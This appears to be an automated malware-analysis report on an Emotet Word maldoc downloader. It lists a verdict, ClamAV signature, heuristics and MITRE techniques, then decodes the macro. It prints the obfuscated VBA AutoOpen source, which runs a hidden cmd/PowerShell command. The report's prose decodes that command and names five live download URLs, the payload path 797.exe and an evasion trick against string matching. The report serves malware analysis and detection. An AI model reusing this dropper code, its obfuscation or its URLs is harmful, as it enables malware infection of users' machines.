Verdict: MALICIOUS (Risk Score 142)
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic; T1566.001 Spearphishing Attachment
ClamAV flags the file with the signature Doc.Downloader.Emotet-6787868-0, which places it in the Emotet maldoc downloader family. The recovered VBA project contains an AutoOpen procedure, so the code runs as soon as the document is opened with macros enabled. The procedure is padded with dead array assignments and, in the middle of them, calls Shell (written Shell@, a type-suffix spelling that plain "Shell " string matching misses) with window style 0 (vbHide) on the concatenation of three functions, IJRCocJpHiG + ZSalkIYl + QKwcbvlm; only the first survives the preview truncation. Its string fragments are assembled with Format(Chr(a + b + ...)) arithmetic (99 = "c", 67 = "C", 34 = the double quote) and are laced with cmd.exe caret escapes (^). Removing the carets gives a cmd /V command that stores its payload reversed in the variable XKd, rebuilds it one character at a time with a for /L loop into QSl, and passes the result to call. Reversing that payload yields a PowerShell one-liner: it creates a Net.WebClient, splits a list of five URLs on "@" (http://newspectiveaddress.com/rOTph, http://lariotgrilli.com/2z8FmXgi, http://agkemc.com/fsHYxx, http://webartikelbaru.web.id/3ykDP, http://artikeltentangwanita.com/L8097n), and for each one tries DownloadFile into $env:public\797.exe followed by Invoke-Item, breaking at the first success. That is the standard Emotet first stage, and beyond the two techniques listed above it also covers T1059.003 (Windows Command Shell), T1059.001 (PowerShell) and T1105 (Ingress Tool Transfer).
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-6787868-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6787868-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description does not hold for this sample: a VBA project was recovered (macros.bas under Extracted artifacts) and the AutoOpen marker it reports is the same AutoOpen the OLE_VBA_AUTOOPEN finding covers, so treat this finding as redundant rather than as a second execution surface.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the DrawingML XML namespace that any Office document carrying drawing markup references, a file-format artifact and not an indicator. The actual download URLs are only present inside the macro strings in caret-obfuscated, reversed form and are not surfaced by this heuristic.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4330 bytes | b3630eb3324ce0ec00cae2680b59d19c351eea8dfddbceab6e100eeef3597a22 |
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "jisMDRw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim jujpOz()
ReDim jujpOz(4)
jujpOz(0) = 506070408
jujpOz(1) = 324
jujpOz(2) = 441
jujpOz(3) = 6
Dim CczCM()
ReDim CczCM(4)
CczCM(0) = 781
CczCM(1) = 9
CczCM(2) = 9150
CczCM(3) = 9
Dim qjzcp()
ReDim qjzcp(3)
qjzcp(0) = 469
qjzcp(1) = 776
qjzcp(2) = 74
Dim HoQjJA()
ReDim HoQjJA(4)
HoQjJA(0) = 1277
HoQjJA(1) = 89
HoQjJA(2) = 8403
HoQjJA(3) = 45
Dim SKwOn()
ReDim SKwOn(3)
SKwOn(0) = 447267940
SKwOn(1) = 154510115
SKwOn(2) = 123
Dim QiSWYD()
ReDim QiSWYD(2)
QiSWYD(0) = 7606
QiSWYD(1) = 33
Shell@ IJRCocJpHiG + ZSalkIYl + QKwcbvlm, Format(0)
Dim SNHvH()
ReDim SNHvH(5)
SNHvH(0) = 5
SNHvH(1) = 216725380
SNHvH(2) = 28
SNHvH(3) = 4292
SNHvH(4) = 34
Dim ikzjZ()
ReDim ikzjZ(2)
ikzjZ(0) = 4056
ikzjZ(1) = 49753595
Dim zDUZR()
ReDim zDUZR(3)
zDUZR(0) = 336113972
zDUZR(1) = 529
zDUZR(2) = 975
Dim zFdCv()
ReDim zFdCv(3)
zFdCv(0) = 7
zFdCv(1) = 381
zFdCv(2) = 2857
End Sub
Attribute VB_Name = "IDrCGYOVw"
Function IJRCocJpHiG()
On _
Error _
Resume _
Next
Dim Qcvzz()
ReDim Qcvzz(2)
Qcvzz(0) = 40
Qcvzz(1) = 4827
Dim mPCBMC()
ReDim mPCBMC(3)
mPCBMC(0) = 51599234
mPCBMC(1) = 2635
mPCBMC(2) = 207
YQvqa = Format(Chr(10 + 16 + 11 + 5 + 57)) + "md /V^:/" + Format(Chr(7 + 11 + 8 + 3 + 38)) + Format(Chr(3 + 5 + 3 + 1 + 22)) + "^s^e^t" + " ^XK^d=^ ^ ^ ^ ^ " + "^ ^ ^ " + " ^ ^ ^ }^}{h" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^t^a" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "}^;^" + "k^aerb;^F^zv^" + "$ m^e^t^I^" + "-^ek^ovn^I^;)" + "Fzv$^ ,S^BV$(eliFd^a^o^ln" + "w^o^D.^wV^B${^yr^t^{" + ")YRn^$ ni^ SBV^" + "$(^h" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^a^ero^f;^'^ex^e^.^'+^z^S" + "r^$^+^'"
Dim ICjTl()
ReDim ICjTl(4)
ICjTl(0) = 242176595
ICjTl(1) = 8309
ICjTl(2) = 486
ICjTl(3) = 91
Dim KjuCz()
ReDim KjuCz(2)
KjuCz(0) = 2230
KjuCz(1) = 927
Dim pBVEZ()
ReDim pBVEZ(4)
pBVEZ(0) = 3417
pBVEZ(1) = 1
pBVEZ(2) = 4
pBVEZ(3) = 12
iSAlzkwSbWo = "\'^+" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "il^bup:vn^e$=" + "Fzv^$^;'^7^9^7'" + "^ ^= ^z^Sr^$;)^'^@'(^til^pS." + "'n7^9^0^8^L/^m^o" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^.atin" + "^aw^gn" + "a^tn^e^t^l" + "^ek^i^tr^a//:ptt^h@P^Dky^3/^d" + "i.^be^w^.urab^le^kitr^ab^ew//" + "^:p^t^th^@^x^xYH" + "^sf/m^o" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^." + Format(Chr(10 + 16 + 11 + 5 + 57)) + "megka//^:^p" + "^t^th^@^i^gXm^F^8z2/mo" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^.l^l^i"
Dim ZHsZF()
ReDim ZHsZF(4)
ZHsZF(0) = 344686345
ZHsZF(1) = 91519779
ZHsZF(2) = 4715
ZHsZF(3) = 6
Dim ToiVKX()
ReDim ToiVKX(5)
ToiVKX(0) = 1485
ToiVKX(1) = 2913
ToiVKX(2) = 30
ToiVKX(3) = 9967
ToiVKX(4) = 5
Dim MOtwY()
ReDim MOtwY(3)
MOtwY(0) = 22
MOtwY(1) = 1602
MOtwY(2) = 91
Dim mXBPuz()
ReDim mXBPuz(5)
mXBPuz(0) = 3
mXBPuz(1) = 8077
mXBPuz(2) = 4
mXBPuz(3) = 793
mXBPuz(4) = 99
shGpbmnXn = "r^gto^ira^l//:" + "^p^t^t^h^@hpT^Or/^mo" + Format(Chr(10 + 16 + 11 + 5 + 57)) + ".^ss^er" + "d^d^a^ev^i^t" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^ep" + "s^w^en//^:p^t^th'=^Y" + "Rn$^;tnei^l" + Format(Chr(7 + 11 + 8 + 3 + 38)) + "^be^W.t^eN t" + Format(Chr(10 + 16 + 11 + 5 + 57)) + "e^jb" + "^o-^wen=^wVB$^ lle^h^srew" + "^o^p&&^f^or /^L %^T ^in (3^" + "7^6^;-^1^;0)^d^" + "o ^se^t ^Q^S" + "l=!^Q^Sl" + "!!^XK^d:~%" + "^T,1!&&^i^f %^T=^=^0 " + Format(Chr(10 + 16 + 11 + 5 + 57)) + "^a^ll"
Dim cfpJLs()
ReDim cfpJLs(3)
cfpJLs(0) = 29
cfpJLs(1) = 333202737
cfpJLs(2) = 6172
Dim KwhNF()
ReDim KwhNF(4)
KwhNF(0) = 857
KwhNF(1) = 9
KwhNF(2) = 9823
KwhNF(3) = 6439
Dim NjsvJp()
ReDim NjsvJp(3)
NjsvJp(0) = 7
NjsvJp(1) = 2123
NjsvJp(2) = 24
Dim frCGTv()
ReDim frCGTv(3)
frCGTv(0) = 62
frCGTv(1) = 9
frCGTv(2) = 38
pp
... (truncated)